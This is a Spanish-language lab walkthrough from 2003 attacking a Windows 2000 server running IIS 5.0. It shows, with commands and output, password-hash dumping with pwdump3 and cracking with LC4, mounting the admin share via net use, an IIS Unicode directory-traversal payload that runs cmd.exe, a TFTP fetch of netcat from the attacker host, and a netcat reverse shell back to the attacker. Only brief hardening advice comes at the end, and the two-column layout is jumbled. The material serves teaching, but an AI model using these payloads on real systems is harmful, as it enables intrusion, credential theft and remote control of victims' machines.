Paso Uno (en el equipo del atacante)
C:\>pwdump3 win2000 arc.txt administrador
pwdump3 by Phil Staubs, e-business technology
Copyright 2001 e-business technology, Inc.
Se obligar a la victima enviar sus cuentas y
contraseñas,luego para crackear las contraseñas,
usamos la herramienta L0Phtcack
La sintaxis para pwdump3 es :
Win2000 : la maquina a “saquear” sus cuentas
Arc.txt : archivo donde se copiaran las cuentas

This program is free software based on pwpump2 by Tony Administrador: cuenta usada, esta debe tener
Sabin under the GNU General Public License Version 2 privilegios de administrador.
(GNU GPL), you can redistribute it and/or modify it under the
terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED,
IS GRANTED WITH THIS PROGRAM. Please see the
COPYING file included with this program (also available at
www.ebiz-tech.com/pwdump3) and the GNU GPL for further
details.
 Roberto Carlos Guevara Calume

Paso Dos Pide la contraseña de administrador, que fue

lograda bien sea con ataque (2) smb capture o
Please enter the password >******* Ataque (4) Pipeupadmin.

Paso tres En pocos segundos se crea el archivo arc.txt

Y se cracka con el programa LC4
Abrimos el programa LC4
En la opción File creamos una nueva Sesión
File // New session
Importamos el archivo Arc.txt tiempo después
Import // Import form PWDump File (según la cantidad de cuentas y lo complejo de las
claves )

Ilustración 3 Ataque a Contraseñas

Los datos y el ataque realizado es real♣, Estas cuentas son reales, se escogieron
las cuentas mas representativas creadas por el administrador, las Cuentas del
sistema como Krtbtgt, TsInternetUser, IUSR_WIN2000 IWAM_WIN2000 etc... no
se tuvieron encuanta así como las des activadas.

Crear una consola remota

ATAQUE CONSOLA REMOTA Narración

Paso Uno
Como conocemos la contraseña del administrador
Ejecutar net use asi:
Intentamos hacer una conexión como
C:\>net use \\192.168.0.3\ipc$ 1234 /u: administrador administrador

Se ha completado el comando correctamente.

Paso Dos

Ejecutar net use asi: Conectamos una nueva unidad de red, el

dispositivo C del equipo 192.168.0.3 a una unidad
C:\>net use * \\192.168.0.3\c$ No usada, en este caso Y:

♣
El tiempo tomado para crakerar fue alrededor de 7 minutos en estas condiciones, pero una sola contraseña como
Aad456j$23%tg&34/(67),?[{Fadr45212 puede ser virtualmente inviolable pues los tiempos de espera serian de muchos
años, posiblemente cientos o miles, es decir el uso de mayúsculas minúsculas , números, caracteres especiales y larga,
pero con más velocidad de proceso, mejores algoritmos, y uso de computación distribuida, puede reducir la cantidad de
tiempo.
 Roberto Carlos Guevara Calume

La unidad Y: está conectada a \\192.168.0.3\c$. Y: es una unidad de red de nuestro equipo al

equipo Victima (No necesariamente compartido
Se ha completado el comando correctamente. explícitamente por la victima)

Paso Tres Creamos una consola en modo de escucha en

nuestro equipo

Paso Cuatro Copiamos NETCAT NC.exe al equipo victima

El acante puede registrar las pulsaciones del teclado como, Invisible KeyLogger
Sealt (IKS) , o usar FrakeGINA,

intentamos no atacar el sevicio de Web sino tomar el servidor que aloja la pagina
web.

Mostrando el directorio C: del servidor con IIS Narración

PASO uno
C:\>nc -vv 192.168.3 80
WIN2000 [192.168.0.3] 80 (http) open

Paso dos

GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 23 Jul 2003 22:47:28 GMT
Content-Type: application/octet-stream
El volumen de la unidad C no tiene etiqueta.
El n·mero de serie del volumen es: 607C-47F0

Directorio de c:\

22/07/2003 12:43 <DIR> Archivos de programa

22/07/2003 12:59 <DIR> Documents and Settings
22/07/2003 12:40 <DIR> Inetpub
23/07/2003 16:42 <DIR> WINNT
1 archivos 59.392 bytes
4 dirs 646.021.120 bytes libres
sent 60, rcvd 602: NOTSOCK

Creando una consola remota

Con el descubrimiento anterior podemos usando TFTP copiar Netcat a nuestra

victima 192.168.0.3 o www.win2000.rcgcalume.org,

antes debe preparar un servidor TFTP que pueda enviar el archivo NC.EXE
(NetCat)
 Roberto Carlos Guevara Calume

Crear consolas remotas Narración

Paso uno

C:>nc -vv 192.168.0.3 80

WIN2000 [192.168.0.3] 80 (http) open

Paso dos
Fuerza a correr el cliente TFTP del servidor
GET /scripts/..%c0%af../winnt/system32/tftp.exe? Haciendo que se copie NC en el c:\
"-i"+192.168.0.1+GET+nc.exe+c:\nc.exe HTTP/1.0
Por comodidad se puede copiar tambien el
HTTP/1.1 502 Error de la puerta de enlace o gateway archivo cmd.exe
Server: Microsoft-IIS/5.0
Date: Wed, 23 Jul 2003 23:41:21 GMT
Content-Length: 321
Content-Type: text/html

<head><title>Error en aplicaci¾n CGI</title></head>

<body><h1>Error CGI</h1>La aplicaci¾n CGI especificada puede
comportarse de form
a anormal si no recibe un conjunto completo de encabezados HTTP.
Los encabezados
retornados
son:<p><p><pre>c:\inetpub\scripts\..\..\winnt\system32\tftp.exe: 'c:
\' es un directorio.
</pre>sent 91, rcvd 486: NOTSOCK
Paso tres
En el Equipo atacante creamaos una
C:\nc>nc -l -p 3000 -nvv consoloa de escucha por el puerto 3000
listening on [any] 3000 ...

Paso cuatro
Luego digamos a NC qie cree una consola
remota a nuestro pc,
Luego de corremos nc en la victima
recuerde atacante es 192.168.0.1
C:\instaladores\herramientas red\nc>nc -vv 192.168.3 80 la victima es 192.168.0.3

WIN2000 [192.168.0.3] 80 (http) open

GET /scripts/..%c0%af../nc.exe?+"-e"+cmd.exe+"-n"
+192.168.0.1+3000
Paso cinco
Luego de hacer el paso 4 en la consola de
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 1958 escucha (creada en el paso 3)
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp. Se crea una consola CMD en el equpp
atacante generada desde el equipo Victima
c:\inetpub\scripts>
Esta consola es equivalente a estar en el
equipo victima. (con todos sus efectos)
Tabla 11 Creación de consola remotas

En este nivel el atacante puede crear cuentas paralelas al administrador, puede

“robar ” y desencriptar totalmente la bases dedatos SAM, borrar cualquier huella,
mantenerse invisible y robar información corporativo así como saltar a otros
sistemas.

Algunas medidas de segurudad, nunca use FAT, use siempre NTFS, (aunque los
ataques anteriores se realizaron con NTFS, y no hay directorios compatidos
 Roberto Carlos Guevara Calume

La gran falla esta en que el atacante puede predecir donde estan los directorios
como:

C:\winnt
C:\winnt\system32
C:\inetpub
C:\inetpub\scripts

La recomendación es cambiar las rutas por defecto, como minimo, ademas el

directorio C:\inetpub debe estar en otra unidad.

Otro problema es que no basta NO compartir, de deben quitar los permisos de

escritura, y ejecución para Cualquier otro no autorizado explícitamente.